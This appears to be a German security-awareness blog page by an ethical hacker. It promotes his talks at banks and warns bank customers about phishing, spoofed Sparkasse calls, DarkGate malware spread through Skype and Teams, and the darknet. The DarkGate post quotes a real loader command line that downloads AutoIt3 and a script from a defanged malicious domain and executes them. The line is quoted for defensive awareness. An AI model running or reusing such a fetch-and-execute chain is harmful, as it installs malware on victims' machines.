Cyberrisk & Cybersecurity – Die Volksbank am Württemberg informiert

Die Volksbank am Württemberg legt großen Wert auf stetige Investitionen in IT-Sicherheit und Aufklärung im Hinblick auf Cybercrime und Cybersecurity. Cyberrisk & Cybersecurity – Die Volksbank am Württemberg informiert.

Daher veranstaltet die um den Württemberg regional verankerte Bank am 25. April 2024, für Ihre FirmenkundInnen, eine spannende und informative Veranstaltung zum Thema Cyberrisk und Cybersecurity 2024: Aktuelle Tipps und Tricks für Internetsicherheit bei Bankgeschäften, Risiken im Netz sowie Möglichkeiten der Absicherung.

Ralf Schmitz, renommierter Hacker und Sicherheitsexperte, gibt neue Einblicke in die aktuelle Situation und den „Giftschrank der Hackerszene“ sowie die Zukunft der Cyberkriminalität, die immer raffinierter und gefährlicher wird.

„Cyberrisk & Cybersecurity 2024“ – Die Volksbank am Württemberg informiert

Hacker Ralf Schmitz  bei einer Volksbank
Hacker Ralf Schmitz bei einer Volksbank

Ethical-Hacker Ralf Schmitz

Hacker versuchen mit Phishing, Malware, Ransomware, Social Engineering und anderen Methoden an sensible Daten zu kommen

Er zeigt auf, wie Hacker mit Phishing, Malware, Ransomware, Social Engineering und anderen Methoden versuchen, an sensible Daten und Gelder von BankkundInnen zu gelangen. Er warnt vor den Risiken, die das Internet für die Privatsphäre, die Identität und die Finanzen der NutzerInnen birgt.

Außerdem wird er den TeilnehmerInnen praktische Tipps und Tricks zeigen, wie man sich vor Cyber-Angriffen schützen und sicher im Internet surfen sowie Bankgeschäfte erledigen kann.

Unternehmen Opfer von Cyber- oder Wirtschaftskriminalität

Die Frage ist nicht, ob Ihr Unternehmen Opfer von Cyber- oder Wirtschaftskriminalität wird, sondern nur wann. Auch wenn alle möglichen vorbeugenden Maßnahmen ergriffen sind, ist das Risiko hoch, Opfer krimineller Handlungen zu werden.

Denn Wirtschaftskriminalität und Cyber-Attacken sind in unserer digitalen Welt keine Seltenheit mehr und die damit verbundenen finanziellen Schwierigkeiten können die Existenz Ihres Unternehmens schnell gefährden.

Ganz nach dem Motto „Zukunft digital gestalten und gemeinsam vorausdenken“ erfahren Sie im Vortrag von Ingo Steinwedel von der R+V-Versicherung, wie Sie sich finanziell bestens darauf vorbereiten und wie im Schadensfall die Expertenteams der R+V Sie gemeinsam mit Ihrem IT-Dienstleister praktisch, schnell und zuverlässig unterstützen. Wir freuen uns.

Ingo Steinwedel, Produktförderer MultiLine – R+V Versicherung

Für weitere Informationen kontaktieren Sie bitte:

Volksbank am Württemberg eG

Laura Serby

Tel.: 0711/30501 4303

E-Mail: laura.serby ( at ) voba-aw.de

Web: www.voba-aw.de

Achtung! Spoofing-Anrufe von Sparkassen

Die Sparkassen warnen ihre Kunden vor einer neuen Betrugsmasche, dem so genannten „Spoofing“. Dabei rufen Betrüger die Kunden an und geben sich als Mitarbeiter der Sparkasse aus. Dabei verwenden sie eine gefälschte Telefonnummer, die der echten Sparkassennummer ähnelt. Achtung! Spoofing-Anrufe von Sparkassen.

Die Betrüger versuchen, an die Zugangsdaten zum Online-Banking oder an persönliche Daten der Kunden zu gelangen.

Die Masche ist nicht neu, aber nach wie vor gefährlich. Bereits im vergangenen Jahr haben Sparkassen aus verschiedenen Bundesländern in ihrem Blog über Spoofing-Anrufe berichtet, weiß Sicherheitsexperte Ralf Schmitz.

Die Kriminelle nutzen dabei verschiedene Vorwände, um die Kunden zu täuschen. So wird beispielsweise behauptet, dass der Computer des Kunden von Viren befallen sei, ein neues Sicherheitszertifikat benötigt würden oder eine verdächtige Transaktion auf dem Konto stattgefunden hätte.

Achtung! Spoofing-Anrufe von Sparkassen

Die Betrüger fordern den Kunden dann auf, eine Fernwartungssoftware zu installieren, eine TAN einzugeben oder eine Überweisung zu tätigen.

Die Sparkassen weisen darauf hin, dass sie niemals unaufgefordert anrufen und nach persönlichen Daten oder Zugangsdaten fragen. Kunden sollten solche Anrufe sofort beenden und die Nummer der Sparkasse zurückrufen, um die Echtheit des Anrufs zu überprüfen.

Gefälschter Anruf der Sparkasse Bonn durch Hacker Ralf Schmitz

Bei Verdacht auf einen Spoofing-Versuch sollten sich Kunden umgehend mit ihrer Sparkasse in Verbindung setzen und gegebenenfalls den Online-Banking-Zugang oder die Kreditkarte sperren lassen.

Die Sparkassen bieten ihren Kunden verschiedene Möglichkeiten, sich vor Spoofing-Anrufen zu schützen. Dazu gehören unter anderem

– Die Nutzung der Sparkassen-App, die eine sichere TAN-Generierung auf dem Smartphone ermöglicht.

– Die Aktivierung der Funktion „Vertrauenswürdige Geräte“, die nur die Anmeldung von zuvor registrierten Geräten zulässt.

– Die regelmäßige Überprüfung der Kontobewegungen und Umsätze im Online-Banking.

– Die Beachtung der aktuellen Sicherheitshinweise auf der Internetseite der Sparkassen https://www.sparkasse.de/service/sicherheit-im-internet.html

Die Sparkassen nehmen die Sicherheit ihrer Kunden sehr ernst und arbeiten ständig an der Verbesserung ihrer Systeme und Prozesse.

Sie bitten ihre Kunden, wachsam zu sein und verdächtige Vorfälle zu melden. Um die Kunden für das Thema Spoofing zu sensibilisieren, bieten sie auch Sicherheitsvorträge an, in denen der bekannte Ethical-Hacker Ralf Schmitz die Tricks und Methoden der Betrüger aufdeckt.

Ralf Schmitz ist ein ehemaliger Polizeibeamter mit SEK und GSG9 Erfahrung, der heute als Sicherheitsexperte und Trainer tätig ist. In seinen Vorträgen zeigt er, wie einfach es ist, sich als Sparkassenmitarbeiter auszugeben und wie man sich davor schützen kann.

Außerdem erklärt er, wie man Phishing-Mails, Fake-SMS oder andere Betrugsversuche erkennt und vermeidet sowie die Sicherheit am Handy, Tablet oder PC erhöht. 

Hacker Ralf Schmitz beim Sparkassenvortragin Berlin

Die Sicherheitsvorträge von Ralf Schmitz finden in Sparkassen / Banken statt und sind für die Kunden der Sparkasse in der Regel kostenlos.  Die Hacker-Vorträge sind für alle Sparkassen-Kunden, Mitarbeiter und auch Nicht-Kunden geeignet, die mehr über Spoofing und andere Betrugsmaschen erfahren möchten.

Die Sparkassen hoffen, dass die Kunden durch die Vorträge von Ralf Schmitz besser informiert und geschützt werden. Sie appellieren an die Kunden, niemals auf verdächtige Anrufe, E-Mails oder SMS zu reagieren und immer die offiziellen Kontaktwege der Sparkassen zu nutzen.

Volksbanken warnen vor Phishing-Angriffen in der Weihnachtszeit

Die Volksbanken und Raiffeisenbanken warnen ihre Kunden vor einer Zunahme von Phishing-Angriffen in der Weihnachtszeit. Dabei versuchen Betrüger, mit gefälschten E-Mails oder SMS an die Zugangsdaten zum Onlinebanking oder zur VR SecureGo plus-App zu gelangen. Volksbanken warnen ausdrücklich vor diesen Phishing-Angriffen in der Weihnachtszeit

Die Phishing-Nachrichten sind oft täuschend echt gestaltet und enthalten einen Link zu einer gefälschten Webseite, auf der die Kunden ihre Daten eingeben sollen.

Die Betrüger nutzen dabei verschiedene Vorwände, wie zum Beispiel ein Weihnachtsgewinnspiel, eine Aufforderung zu einer notwendigen Umstellung auf ein neues Sicherheitssystem oder eine drohende Sperrung der VR SecureGo plus-App, Betrüger versenden auch gefälschte Booking.com-Nachrichten, um Zugangsdaten zu erlangen oder Kontaktversuche von vermeintlichen Bankmitarbeitern, um TAN-Freigaben für digitale Girocards zu erreichen. Das sind nur einige der perfide Betrugsmaschen, die Hacker Ralf Schmitz in seinen Sicherheitsvorträgen vorstellt.

Die Volksbanken und Raiffeisenbanken weisen darauf hin, dass sie niemals per E-Mail oder SMS nach persönlichen Daten oder Zugangsdaten fragen. Kunden sollten solche Nachrichten sofort löschen und nicht auf Links oder Anhänge klicken. Wenn Kunden einen Phishing-Versuch vermuten, sollten sie sich umgehend an ihre Volksbank oder Raiffeisenbank wenden und gegebenenfalls ihren Online-Banking-Zugang oder ihre Kreditkarte sperren lassen.

Die Volksbanken und Raiffeisenbanken bieten ihren Kunden verschiedene Möglichkeiten, sich vor Phishing-Angriffen zu schützen. Dazu gehören unter anderem:

  • Die Nutzung der VR SecureGo plus-App, die eine TAN-Generierung auf dem Smartphone ermöglicht.
  • Die Aktivierung der Funktion „Vertrauenswürdige Geräte“, die nur die Anmeldung von zuvor registrierten Geräten erlaubt.
  • Die regelmäßige Überprüfung der Kontobewegungen und der digitalen Girocards im Online-Banking.
  • Die Beachtung der aktuellen Phishing-Warnungen auf der Webseite der Volksbanken und Raiffeisenbanken https://www.volksbank-eg.de/banking-service/sicherheit/phishing-warnungen.html.

Die Volksbanken und Raiffeisenbanken nehmen die Sicherheit ihrer Kunden sehr ernst und arbeiten ständig daran, ihre Systeme und Prozesse zu verbessern. Sie bitten ihre Kunden, wachsam zu sein und verdächtige Vorfälle zu melden oder die Sicherheitsvorträge zu besuchen.

Phishing-Mails und die neusten Tricks…

Es gibt ein paar Wahrheiten über Phishing-Mails: Erstens nerven sie, zweitens werden sie immer ausgefeilter, drittens sind sie eigentlich leicht als Betrugsversuche zu identifizieren. Und zuletzt: Darauf hereinfallen tun immer nur die anderen. Phishing-Mails und die neusten Tricks „Das würde mir doch nie passieren.“

Trotzdem wurde bereits die IT der Uni-Klinik in Düsseldorf komplett zum Stillstand gebracht. Operationen musste abgesagt werden, die Notaufnahme wurde überlastet. Hacker übernahmen sogar die Rechner der Kommunalverwaltung Anhalt-Bitterfeld. Es dauerte acht Monate, bis der Notbetrieb wieder aufgehoben werden konnte. Nur weil irgendjemand so einen blöden Link in einer E-Mail angeklickt hatte.

Phishing-Mails und die neusten Tricks...
Phishing-Mails und die neusten Tricks…

Was bewegt überhaupt Menschen, auf die Links in solchen Mails zu klicken, obwohl sie es besser wissen müssten? Liegt es an mangelndem Problembewusstsein der Mitarbeiterinnen und Mitarbeiter? An Langeweile? Ein Forscherteam der Friedrich-Alexander-Universität Erlangen ging dieser Frage nach und kam zu der Erkenntnis, dass der Hauptgrund schlichte Neugier ist, gepaart mit einem Inhalt, der einen Bezug zum Empfänger hat. Es ist also mehr ein psychologisches als ein technisches Phänomen.

Phishing-Mails und die neusten Tricks…

In dem zugrundeliegenden Experiment schickten die Wissenschaftler kurz nach Neujahr eine Mail an 1.200 Studentinnen und Studenten. Der Inhalt war ganz unverdächtig und lautete, die Silvesterparty sei toll gewesen und hier seien die Bilder davon. Zusammen mit dem Hinweis, man solle die Bilder niemandem zeigen, der nicht dabei war.

Ergebnisse ließen IT-Verantwortliche blass und Marketing-Spezialisten grün vor Neid werden.

Die Ergebnisse ließen IT-Verantwortliche blass und Marketing-Spezialisten grün vor Neid werden. Die Klickrate betrug stolze 25 Prozent. Also hatten ein Viertel der Adressaten den Link in der E-Mail angeklickt, obwohl die Fete nie stattgefunden hatte. Selbstredend, dass die Wissenschaftlerinnen und Wissenschaftler keinen Schaden anrichteten und lediglich verzeichneten, wer reingefallen war.

Hacker Ralf Schmitz berichtet….

Als man die Versuchspersonen später nach den Gründen für den Klick befragte, sagten 34 Prozent, sie seien einfach neugierig auf die Fotos gewesen, 27 Prozent nannten den passenden Zeitpunkt kurz nach Silvester und 16 Prozent meinten, die Absender-Adresse zu kennen. Diese Zahlen belegen nur den Eindruck, den Sicherheitsverantwortliche in den letzten Jahren gewinnen konnten: Gerade die Aussicht auf Bilder ließ die Angesprochenen auf Links klicken. Und je besser der Text in die gegenwärtige Situation des Empfängers passt, desto wahrscheinlicher ist die Aktion erfolgreich.

Erfolge der Cyber-Kriminellen sind fast schon vorprogrammiert.

Die Erfolge der Cyber-Kriminellen sind fast schon vorprogrammiert. Sie feilen nur noch am Kontext immer genauer. Mit ein wenig Recherche in Sozialen Medien, Facebook bietet sich da an, noch besser sind aber LinkedIn und Xing, ist es kein großer Aufwand, eine Mail auf den Empfänger maßzuschneidern. Wenn nämlich persönliche oder berufliche Details in der E-Mail auftauchen, Firmennamen oder Jobwechsel, lassen diese den Inhalt umso glaubhafter erscheinen. Selbst hier könnte Künstliche Intelligenz helfen, den Betrügern in Zukunft viel Handarbeit zu ersparen.

Die Leiterin der zuvor genannten Studie, Frau Dr. Benenson, sagt wohl zu Recht, dass mit sorgfältiger Planung und Ausführung jeder dazu gebracht werden kann, solch einen Link anzuklicken, und sei es nur aus Neugier. Oder aus Angst, weil angedroht wird, Konten zu sperren oder angeblich teure Bestellungen getätigt zu haben.

Die Cyber-Halunken wenden demnach ganz simple psychologische Tricks an, um die Opfer in die Falle zu locken.

Phishing-Mails wenden psychologische Tricks an!

Was also ist die Konsequenz für Unternehmen und Institute daraus? An einer entsprechenden Schulung der Mitarbeiter, in der sie für die Problematik sensibilisiert werden, führt kein Weg vorbei, dies gilt gerade für technisch weniger versierte Angestellte. Für private Nutzerinnen und Nutzer vielleicht dieser Tipp: Wenn es emotional wird, wenn Neugier oder Angst die Kontrolle übernehmen könnten, die Nachricht sofort löschen. Banken, Sparkassen und Online-Händler schicken niemals emotionale Angelhaken.

Noch fragen sie nach Kontodaten oder wollen persönliche Angaben. Doch, so schade es ist, gibt es keinen 100%-igen Schutz vor digitalem Betrug. Doch es hilft schon, sich einfach mit solchen Themen zu beschäftigen. Denn auch hier macht Übung den Meister.

Hacker verteilen Malware über Microsoft Teams und Skype

Eine besonders tückische Malware mit dem Namen „DarkGate“ wird derzeit über Skype- und Teams-Konten übertragen. Hacker verteilen Malware über Microsoft Teams und Skype.

Zur Zeit läuft aktuell eine Hacker-Kampagne, bei der Cyberkriminelle Microsofts Kommunikationsplattformen Skype und Teams missbrauchen, um die Malware

zu verteilen, so der Ethical- Hacker Ralf Schmitz.

 Wie die Angriffe ablaufen und wie Sie sich schützen können erklärt  Ralf Schmitz.

Die Hacker nutzen kompromittierte Skype-Konten, um Nachrichten mit VBA-Loader-Skript-Anhängen zu verschicken, die sich als PDF-Dokument ausgeben.

Der Zugriff auf das Skype-Konto ermöglicht den Hackern, einen bestehenden Nachrichten-Thread zu kapern und die Dateien so zu benennen, dass sie zum Kontext des Chat-Verlaufs passen. Das ist sehr gefährlich. 

Was sich die Betroffenen auf ihren PC herunterladen, ist auf den ersten Blick somit nicht unbedingt zu erkennen.

Nicht alle Virenschutzprogramme erkennen diesen Angriff und so kann in kurzer Zeit eine Vielzahl von Rechnern / Handys infiziert werden, so Hacker Ralf Schmitz. 

So verbreitet sich diese Malware

Diesmal heißt die Malware  „DarkGate“ und verbreitet sich derzeit über Skype- und Teams-Konten.

Hacker verteilen Malware über Microsoft Teams und Skype

Die Masche dieser Malware ist diesmal besonders tückisch. Die Hacker versenden Nachrichten mit VBA-Loader-Skript-Anhängen, so z. B.

C:\Windows\System32\cmd.exe“ /c mkdir c:\zohn & cd /dc:\zohn & copy C:\windows\system32\curl.exe zohn.exe & zohn -o Autoit3.exe hxxp:/ /reactervnamnat[.]com:80 & zohn -o BzpXNT.au3 hxxp://reactervnamnat[.]com:80/msimqrqcjpz & Autoit3.exe BzpXNT.au3  

um die PCs ihrer Opfer mit der Schadsoftware zu infizieren.

Hacker verteilen Malware über Microsoft Teams und Skype
Hacker verteilen Malware über Microsoft Teams und Skype

Bestehende Nachrichtenverläufe werden nachgestellt und die Namen der Dateien so gestaltet, dass sie dem Kontext des Chatverlaufs entsprechen, schreibt dazu TrendMicro eine Sicherheitsfirma. 

Die Vorsichtsmaßnahme, nur Dateien von bekannten Kontakten anzunehmen, hilft also bei „DarkGate“ wenig. 

Ein großes Datenleck könnte dahinterstecken!

Es ist zur Zeit noch unklar, wie die Konten der Anwendungen kompromittiert wurden.

Es wird jedoch vermutet, dass dies entweder durch durchgesickerte Zugangsdaten in Untergrundforen oder durch die vorherige Kompromittierung der Mutterorganisation geschah.

Sicherheitstipp von Ethical-Hacker Ralf Schmitz!

Skype- und Teams-Nutzer*innen rät Ralf Schmitz ihre Sicherheitssoftware und Antivirenprogramme immer zu aktualisieren und auch wöchentliche Prüfungen auf Handy, PC, Tablet durchzuführen, um Schadsoftware auf den eigenen Geräten frühzeitig zu erkennen.

Auch Sicherheitsvorträge die solche Angriffe live einmal zeigen und die Ralf Schmitz regelmäßig in Deutschland anbietet, können die Sicherheit erhöhen.  

Auch Virenschutzsoftware von verschiedenen Herstellern, können helfen. Diese darf aber nicht zeitgleich auf allen Geräten ausgeführt werden.

Wenn  Opfer die präparierte Datei angeklickt haben, löst dies den Download und die Ausführung eines AutoIT-Skripts zum Starten der DarkGate-Malware aus. Der Hacker hat nach der erfolgreichen Installation der Malware dann mehrere Optionen.

So ließen sich Informationen stehlen und die Systeme mit verschiedenen Arten von Schadsoftware infizieren, darunter Ransomware, bösartige Fernsteuerungs-Tools und Crypto-Miner.

Außerdem wird gerade beobachtet, dass die Angreifer versuchten, die DarkGate-Malware via Microsoft Teams in Unternehmen und Finanzinstitute einzuschleusen, die den Dienst so konfiguriert haben, dass er Nachrichten von externen Usern akzeptiert. Dabei sendeten die Kriminellen ZIP-Archive mit einer LNK-Datei, die dazu dient, ein VBA-Skript auszuführen.

Das wichtigste Mittel, um Hackerangriffe zu verhindern, ist eine Menge Erfahrung im Netz und Sicherheitssoftware, um solche perfiden Angriffe zu verhindern.

Zunahme von Phishing-Angriffen auf Bankkunden und Schutzmaßnahmen

In den letzten Monaten hat die Bedrohung durch Phishing-Angriffe auf Bankkunden bedenklich zugenommen, sagt Hacker Ralf Schmitz . Diese Angriffe haben das Ziel, sensible Kontodaten zu stehlen und finanziellen Schaden anzurichten. Zunahme von Phishing-Angriffen auf Bankkunden und Schutzmaßnahmen.

Angreifer nutzen dabei immer raffiniertere Methoden, um ihre Opfer zu täuschen. Ein aktueller Bericht von ZDF WISO beleuchtet diese wachsende Gefahr und bietet wichtige Einblicke für Verbraucher.

Gestohlene Bankdaten durch Phishing

WISO crime: Virtuellen Bankräubern auf der Spur

Der Bericht „Phishing: Gestohlene Kontodaten“ von ZDF WISO https://www.zdf.de/verbraucher/wiso/phishing-gestohlene-kontodaten-100.html hebt hervor, wie Hacker vorgehen, um an unsere vertraulichen Informationen zu gelangen.

Zunahme von Phishing-Angriffen auf Bankkunden und Schutzmaßnahmen

Diese Angreifer geben sich oft als legitime Institutionen aus, wie Banken oder Regierungsbehörden, und täuschen die Opfer mit gefälschten E-Mails, SMS oder Telefonanrufen. In vielen Fällen werden die Empfänger dazu gedrängt, persönliche Daten preiszugeben oder auf gefährliche Links zu klicken, so Ralf Schmitz.

Solche betrügerischen Aktivitäten können verheerende Folgen für Bankkunden haben. Finanzielle Verluste, Identitätsdiebstahl und der Missbrauch sensibler Informationen sind nur einige der möglichen Konsequenzen. Daher klärt Ralf Schmitz in seinen Hacker-Vorträge Mitarbeiter und Kunden von Kreditinstituten auf, wie man sich richtig schützen kann, denn die Gefahren haben zugenommen.

Es ist von größter Bedeutung, dass Verbraucher sich dieser Gefahr bewusst werden und geeignete Schutzmaßnahmen ergreifen.

Zunahme von Phishing-Angriffen auf Bankkunden und Schutzmaßnahmen

Sicherheitsexperten wie Ralf Schmitz empfehlen, stets misstrauisch gegenüber unerwarteten Nachrichten oder Anfragen zu sein, die persönliche oder finanzielle Informationen erfordern. Vor der Weitergabe von Daten sollte die Echtheit der Anfrage unbedingt überprüft werden, zum Beispiel durch den direkten Kontakt mit der Institution.

Des Weiteren ist es ratsam, starke und einzigartige Passwörter zu verwenden und regelmäßig zu ändern.

Zusätzlich können Sicherheitssoftware und Antivirenprogramme dazu beitragen, Phishing-Angriffe zu erkennen und abzuwehren. Eine umfassende Aufklärung über die Methoden der Angreifer ist der erste Schritt, um sich wirksam vor diesen Bedrohungen zu schützen.

Der Bericht von ZDF WISO unterstreicht die Notwendigkeit einer verstärkten Sensibilisierung der Öffentlichkeit für die Gefahren von Phishing-Angriffen. Es ist von entscheidender Bedeutung, dass Verbraucher informiert und aufgeklärt sind, um ihre persönlichen und finanziellen Informationen zu schützen.

Ein verantwortungsbewusster Umgang mit digitalen Kommunikationsmitteln und ein erhöhtes Bewusstsein für potenzielle Bedrohungen sind von größter Wichtigkeit, um der wachsenden Bedrohung von Phishing-Angriffen wirksam entgegenzuwirken.

Was weiß das Darnet über mich?

Vor einigen Jahren konnten durchschnittliche Internet-Nutzerinnen und -Nutzer mit dem Begriff noch gar nichts anfangen. Doch inzwischen haben schon viele Leute etwas über das Darknet gehört. Meistens jedoch nicht als gute Nachrichten. Denn das Darknet, im Sinne der Starwars-Filme, steht so etwas für die dunkle Seite der Macht. Genauer: des Internets. Dabei ist die Sache im Grunde recht einfach. Was weiß das Darnet über mich?

Das Darknet ist kein eigenes Netzwerk, oder irgendwie unsichtbar. Es ist einfach ein Teil des Internets, das wir beinahe alle meist täglich nutzen. Doch zwei Aspekte unterscheiden das Darknet vom normalen, offenen Internet. Einmal haben dort die Server, auf die zugegriffen wird, keine der gewöhnlichen Namen wie Amazon-PUNKT-de, oder Spiegel-PUNKT-de. Sondern die Websites haben kryptische, ellenlange Namen, die sich keiner merken könnte. Dazu, hier wird es jetzt wortwörtlich dunkel, sind sie nicht herkömmlichen Suchmaschinen zugänglich. Es handelt sich damit um einen anonymen Bereich, der es den Betreibern des Darknets ermöglicht, ihre Identität zu verbergen und so auf Inhalte zuzugreifen, die im regulären Internet nicht zu finden sind.

Doch noch eine zweite Eigenschaft des Darknets ist wichtig. Die Anonymität im Darknet wird durch den Einsatz von speziellen Verschlüsselungstechniken und Anonymisierungsdiensten wie dem Tor-Netzwerk erreicht. Diese Technologien ermöglichen es den Nutzerinnen und Nutzern, ihre tatsächliche so genannte IP-Adresse zu verbergen. Dazu werden die Daten über mehrere Server geleitet, um ihre Identität zu verschleiern. Zwar könnte im Prinzip jeder auf Informationen im Darknet zugreifen, der Internet-Browser „Brave“ hat sogar den Zugang zum Darknet von Haus aus eingebaut. Doch man muss ja erst einmal die komplizierte Adresse im Darknet wissen. Zum Beispiel von einem ominösen Drogen-Händler. Oder eben auch nicht. Dazu gleich mehr.

Was weiß das Darnet über mich?

Allgemein bekannt ist inzwischen, dass im Darknet Informationen und Dienstleistungen angeboten werden, die oft illegal oder zumindest kontrovers sind. Dazu gehören beispielsweise der Handel mit Drogen, Waffen, gestohlenen Daten und gefälschten Dokumenten, Pornografie oder Kreditkartennummern samt PIN.

Es werden auch Bankdaten von Kunden dort gehandelt und es gibt Listen von Finanzinstitute die in nächster Zeit angegriffen werden sollen. So werden dort Sparkassen oder auch Voksbanken genannt.

Es gibt auch Foren und Marktplätze, auf denen illegale Aktivitäten diskutiert und durchgeführt werden. So zu sagen eBay für Verbrecher. Man kann sogar Angriffe auf Server dort bestellen, meistens bei russischen oder nordkoreanischen Hackern, mit anonymen digitalen Zahlungsmitteln. Es können aber auch Morde in Auftrag gegeben werden und die werden mit Bitcoin bezahlt. Leider sind aber auch dort viele persönliche Informationen über einen User zu finden und sogar Kreditkartendaten mit Pins.

Das Darknet wird eben nicht ausschließlich für illegale Aktivitäten genutzt.
Schätzungen, wie viel vom Darknet gesetzeswidrigen Aktivitäten dient, liegen
bei 25 bis 30%.

Es gibt nämlich auch legitime Gründe, warum Menschen das
Darknet nutzen, wie zum Beispiel den Schutz der Privatsphäre in Ländern mit
eingeschränkter Meinungsfreiheit oder den Zugriff auf zensierte Informationen. Journalistinnen und Journalisten kommunizieren über das Darknet aus Ländern wie Russland oder Irak ungefährdet mit ihren Redaktionen zuhause.

Whistleblower geben vertrauliche Informationen aus Unternehmen oder Regierungsstellen an Medien weiter. Weder ist das Darknet nur schwarz, noch das Alltags-Internet nur weiß.

Dennoch ist es wichtig zu betonen, dass die Nutzung des Darknets mit
erheblichen Risiken verbunden ist. Die Anonymität kann dazu führen, dass sich
Kriminelle und Betrüger im Darknet verstecken, was zu finanziellen Verlusten
oder rechtlichen Konsequenzen für die Nutzer führen kann. Es ist daher
ratsam, falls Sie doch einmal neugierig sind, das Darknet mit äußerster
Vorsicht zu nutzen und sich bewusst zu sein, dass illegale Aktivitäten
strafrechtlich verfolgt werden können. Denn wenn am Ende Dinge aus dem Darknet
in Ihrem Alltag landen, ist es vorbei mit der Anonymität. Dann gelten wieder
die gewohnten Regeln, Gesetze und moralisch-ethischen Grenzen. Willkommen auf
der hellen Seite des Internets.

 

„Live-Hacking“ bei der diesjährigen Vertreterversammlung der Volksbank eG, Syke 

Im Rahmen ihrer jährlichen Vertreterversammlung begrüßt die Volksbank eG,Syke ihre Mitglieder, Kundinnen und Kunden in der historischen Gutsscheune des Gut Varrel in Stuhr.“Live-Hacking“ bei der diesjährigen Vertreterversammlung der Volksbank eG, Syke.

Den über 200 Teilnehmenden wird neben der offiziellen Vertreterversammlung und der Vorstellung des Schulbildungsförderungsprojektes VR-DIGICATION ein 45-minütiger Impulsvortrag über aktuelle Methoden von Cyberkriminalität präsentiert.

Live-Hacking“ bei der diesjährigen Vertreterversammlung der Volksbank eG, Syke 

Sicherheitsexperte und Ethical-Hacker Ralf Schmitz kombiniert langjährige Erfahrung im Sicherheitsbereich mit Humor sowie Fachkompetenz mit interaktiven Einlagen zum Internetschutz bei Bankgeschäften. Das Publikum erhält hiermit fundierte Informationen sowie praxisrelevante Sicherheitstipps.

Sicherheitsexperte Ralf Schmitz (sicher-stark.com)
Sicherheitsexperte Ralf Schmitz (sicher-stark.com)

Sicherheitsexperte Ralf Schmitz (sicher-stark.com)

Cyberangriffe auf Finanzinstitute nehmen rasant zu“, so der Fachmann für Computer-Sicherheit

Laut dem Bundeslagebild Cybercrime 2021 des Bundeskriminalamtes wies die Polizeiliche Kriminalstatistik (PKS) 146.363 gemeldete Fälle von Cyber-Straftaten auf, was einen Anstieg von Cyber-Kriminalität um mehr als 12 % im Vergleich zum Vorjahr bedeutet und einem neuen Höchststand entspricht.

Dunkelziffer ist sehr groß

Gründe dafür sind u. a. die nationale/internationale Handels-Globalisierung, maximierte Digitalisierung, aber auch die Corona-Pandemie und der russische Angriffskrieg gegen die Ukraine. Der Aufklärungsquote von 29,3 % stehen verbreitete Anonymität im World Wide Web sowie vermehrte Aktionen der Täter aus dem Ausland und eine sehr große Dunkelziffer gegenüber.

Bundeskriminalamt warnt

„Letztendlich kann die Bekämpfung von Cybercrime nur gemeinsam gelingen: im Dreiklang von gefahrenabwehrenden und repressiven Maßnahmen, präventiven IT-Sicherheitsvorkehrungen und einer ausreichenden Sensibilisierung von Bürgern und Unternehmen hinsichtlich der Gefahren bzw. Eintrittsvektoren durch Cybercrime“, so Martina Link, BKA-Vizepräsidentin.

Bankensektor besonders betroffen

Speziell der Bankensektor ist durch Cybercrime gefährdet und erfolgreiche Hackerangriffe sind in dieser Branche besonders brisant. Dabei entsteht nicht nur ein nicht zu kalkulierender monetärer Schaden durch Datendiebstahl/ –verlust und Schadenersatzansprüche, sondern auch eine langanhaltende Imageschädigung sowie Vertrauensverlust des Kunden gegenüber seinem Finanzinstitut, die die zukünftige Zusammenarbeit belasten oder sogar beenden kann.

Ziehen eine positive Bilanz: (v.l.) die Volksbankvorstände Bernd Meyer und Markus Lüers mit dem Aufsichtsratsvorsitzenden Carsten Fischer sowie dem IT-Experten Ralf Schmitz, der über Sicherheit im Internet referierte.
Ziehen eine positive Bilanz: (v.l.) die Volksbankvorstände Bernd Meyer und Markus Lüers mit dem Aufsichtsratsvorsitzenden Carsten Fischer sowie dem IT-Experten Ralf Schmitz, der über Sicherheit im Internet referierte. © Finkmann/Volksbank

Aufklärung als präventive Maßnahme

Der IT-Sicherheits-Vortrag zur Aufklärung, Schulung und Sensibilisierung von Ralf Schmitz ist ein weiterer Schritt zur Sicherheit und dient als zusätzliche Maßnahme, das Sicherheitsbewusstsein der Teilnehmenden dafür zu schärfen. Deshalb stellt der Experte u. a. aktuelle Hackertools vor und wie sich Privatpersonen und Finanzinstitute davor schützen können. Darüber hinaus präsentiert er aktuelle Fallbeispiele aus der Bankenpraxis sowie viele Tricks und Abkürzungen im Internet.

Vertreterversammlung bei einer Volksbank

Auszüge eines Live-Auftrittes von Ethical-Hacker Ralf Schmitz bei einer Vertreterversammlung einer Volksbank

– Von den Vorbereitungen bis zum Live-Auftritt von Ralf Schmitz –

Erst im Juni 2023 präsentierte Ralf Schmitz wieder bei einigen Vertreterversammlungen von Volksbanken Hackertricks und wie Bankkunden sich davor schützen können.

In einer Bilderreihe können Sie einen kurzen Einblick gewinnen über die Abläufe seines Impulsvortrages.

Die Vorbereitung der Veranstaltung für 350 Gäste!

Ralf Schmitz stellt dem Publikum die Hackertricks vor.

Der Beginn und Auftritt von Hacker Ralf Schmitz.

Die Themen werden vorgestellt.

Spoofing Anrufe liegen voll im Trend.

Ralf Schmitz beim Hacking von Bankenseiten.

Die heiße Phase mit Live Angriffen.

Vertreterversammlung bei einer Volksbank

Jeder Platz wurde besetzt.

Die Vorbereitung für das Buffet vor dem Event der Vertreterversammlung.

Die Vorbereitung für das Buffet vor dem Event der Vertreterversammlung

Hacker Ralf Schmitz bei der Arbeit.

Volles Haus bei dieser Veranstaltung.

Unberechtigte Kontoabbuchungen?

Schauen Sie genau auf Ihren Kontostand!

Kontrollieren Sie die regelmäßigen Kontoauszüge immer auf nicht genehmigte Abbuchungen. Unberechtigte Kontoabbuchungen? Wer hat nicht schon mal unberechtigte Abbuchungen auf dem Konto festgestellt?

Unberechtigte Kontoabbuchungen?
Unberechtigte Kontoabbuchungen?

Das Landeskriminalamt (LKA) warnt vor neuen Phishing-Wellen im Jahr 2023. Manchmal handele es sich dabei um einmalige, geringfügige Belastungen. Manchmal steigerten sich die Belastungen des Kontos aber auch – etwa von anfänglich 1,95 Euro auf bis zu 70 Euro, so das LKA.

Wer viel im Internet unterwegs ist und einkauft, kann bei seinen Zahlungen und Abbuchungen schnell den Überblick verlieren: Stimmen die abgebuchten Summen? Sind alle Zahlungen auch autorisiert worden? Oder hat jemand unberechtigterweise Geld vom Konto abgebucht?

